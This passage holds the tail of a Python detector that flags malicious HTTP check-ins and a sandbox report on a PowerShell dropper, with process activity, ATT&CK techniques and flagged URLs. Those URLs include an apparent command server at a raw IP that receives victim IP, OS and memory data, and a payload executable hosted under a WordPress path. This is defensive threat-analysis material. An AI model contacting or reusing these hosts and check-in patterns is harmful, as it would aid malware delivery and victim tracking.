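    if "windowspowershell/" in req["ua"].lower():
        reasons.append("powershell-user-agent")   # default UA of Invoke-WebRequest
    if _is_ip_literal(host):
        reasons.append("ip-literal-host")         # matches "TCP traffic without DNS query"
    if req["port"] not in (80, 443):
        reasons.append("non-standard-port")
    if host == "api.ipify.org":
        reasons.append("external-ip-lookup")
    if path == "/script_start" and CHECKIN_PARAMS <= params:
        reasons.append("checkin-start")
    if path == "/script_end" and "random_number" in params:
        reasons.append("checkin-end")
    if "/wp-content/" in path and path.endswith(".exe"):
        reasons.append("exe-from-wordpress-path")
    return reasons


def severity(reasons):
    """One strong trait is enough; otherwise two weak traits together are worth a look."""
    if STRONG & set(reasons):
        return "high"
    if len(reasons) >= 2:
        return "medium"
    return None


def scan(requests):
    """Return (index, severity, reasons) for every request that is not benign."""
    hits = []
    for i, req in enumerate(requests):
        reasons = classify(req)
        sev = severity(reasons)
        if sev:
            hits.append((i, sev, reasons))
    return hits


def correlate(requests):
    """Pair script_start with script_end via random_number to rebuild each run."""
    sessions = {}
    for req in requests:
        parts = urlsplit(req["uri"])
        q = parse_qs(parts.query)
        rid = q.get("random_number", [None])[0]
        if rid is None:
            continue
        s = sessions.setdefault(rid, {"start": None, "end": None})
        if parts.path == "/script_start":
            s.update(start=req["ts"], victim_ip=q.get("ip", [None])[0],
                     os=q.get("os", [None])[0], memory=q.get("memory", [None])[0])
        elif parts.path == "/script_end":
            s["end"] = req["ts"]
    for s in sessions.values():
        s["complete"] = s["start"] is not None and s["end"] is not None
    return sessions


if __name__ == "__main__":
    for i, sev, reasons in scan(SAMPLE_REQUESTS):
        r = SAMPLE_REQUESTS[i]
        print(f"{r['ts']} {sev:6} {r['host']}{r['uri'][:40]:<42} {', '.join(reasons)}")
    print(correlate(SAMPLE_REQUESTS))
```

A session that has a start but no end is the more interesting case for a responder: it means the script was still running, or was killed, when the log window closed, and the victim_ip, os and memory fields the script chose to report are exactly what the operator already knows about that host.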
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0516E3F2
Source: classification engine | Classification label: mal76.troj.winPS1@3/10@3/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bootstrap.min[1].css
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mublfckf.cf0.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\XkgoE6Yb52.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\notepad.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\notepad.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0516D2A0 push eax; mov dword ptr [esp], edx | 0_2_0516D2B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB0D78 push cs; retf | 0_2_07CB0F06
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB0696 push es; retf | 0_2_07CB069E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB5658 push edi; retf | 0_2_07CB57FE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB54A0 push esi; retf | 0_2_07CB5646
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB5358 push esp; retf | 0_2_07CB548E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB533A push ebx; retf | 0_2_07CB5346
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB52E2 push edx; retf | 0_2_07CB52EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB5095 push eax; retf | 0_2_07CB5096
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB4F70 push ecx; retf | 0_2_07CB51F6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_07CB1BD0 push ds; retf | 0_2_07CB1EDE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0A402264 push E801005Eh; ret | 0_2_0A402269
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0A402564 push E801005Eh; ret | 0_2_0A402569

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49737
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (119 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3664
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4564 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000000.00000002.1821183287.00000000079BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1823460527.00000000089C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1823460527.00000000089A2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\Desktop\XkgoE6Yb52.ps1 VolumeInformationJump to behavior
MITRE ATT&CK matrix: techniques flagged in this analysis, grouped by tactic, with the count shown in the report in parentheses.

Execution: Windows Management Instrumentation (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (31); Process Injection (1); Obfuscated Files or Information (1); DLL Side-Loading (1)
Discovery: Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (1); System Information Discovery (21)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (11); Non-Standard Port (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14)

No techniques were flagged under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Antivirus scan results for the submitted file:
Source | Detection | Scanner
XkgoE6Yb52.ps1 | 16% | Virustotal
XkgoE6Yb52.ps1 | 14% | ReversingLabs
Remaining scan tables (dropped files, unpacked files, domains): No Antivirus matches
URL scan results:
Source | Detection | Scanner | Label
http://91.206.178.120:5001 | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_end?random_number= | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_end?random_number=$randomNumber | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_start?ip= | 100% | Avira URL Cloud | malware
https://goutteuy.com | 0% | Avira URL Cloud | safe
https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exe | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_end?random_number=33884$Mnl | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_end?random_number=33884 | 100% | Avira URL Cloud | malware
https://goutteuy.com/wp-content/p | 100% | Avira URL Cloud | malware
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | 100% | Avira URL Cloud | malware
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
goutteuy.com | 185.211.7.193 | true | true | - | unknown
